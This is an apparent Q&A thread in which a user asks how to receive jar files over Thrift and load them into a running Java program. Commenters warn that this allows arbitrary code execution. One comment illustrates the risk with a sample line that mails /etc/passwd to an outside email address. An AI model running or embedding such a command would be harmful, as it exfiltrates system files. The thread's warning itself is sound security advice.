# load function arguement Jar during runtime

Tags: java, jar, thrift

I am quite new to working with jars and from reading online I think what I am describing is possible but I am not sure about it. If anyone has an alternative pipeline, I welcome that as well. Thanks for your time.

I would like to do the following:

I have a java program running on my machine and I would like to accept requests jars during runtime from a remote user. The users submits the jar and I would like to add the classes in the jar (which implement some predefined interfaces) to my classpath and call functions that are implemented in the submitted jar. I am using thrift as my communication platform.

1. How can I receive the jar file in thrift?
2. Once I have the jar, how do I load it? (There is no path etc because it was received from elsewhere?)

Comment: Are you aware that with that approach you open up your application to any code? Basically you would allow anyone to provide code to run in your environment that might do anything.

Comment: I see that now. I would like the user to only implement the function specified in the interface. Could you suggest a better approach?

Comment: What you want is basically a plugin functionality. This however is usually not dynamically but static where the user may have some additional jar files at a specific location which is part of the classpath.

Comment: Even if you limit the code to one function, you can still add code like `Runtime.exec("mail to.me@gmail.com < /etc/passwd")` or similar. You need to add a SecurityManager and a custom ClassLoader as a minimum.

Comment: @hotzst I understand that. I need to run it in a cluster where all the processing happens. Hence, I can't do this locally or in a static manner.

Comment: @PeterLawrey I will look into custom classLoaders. Thanks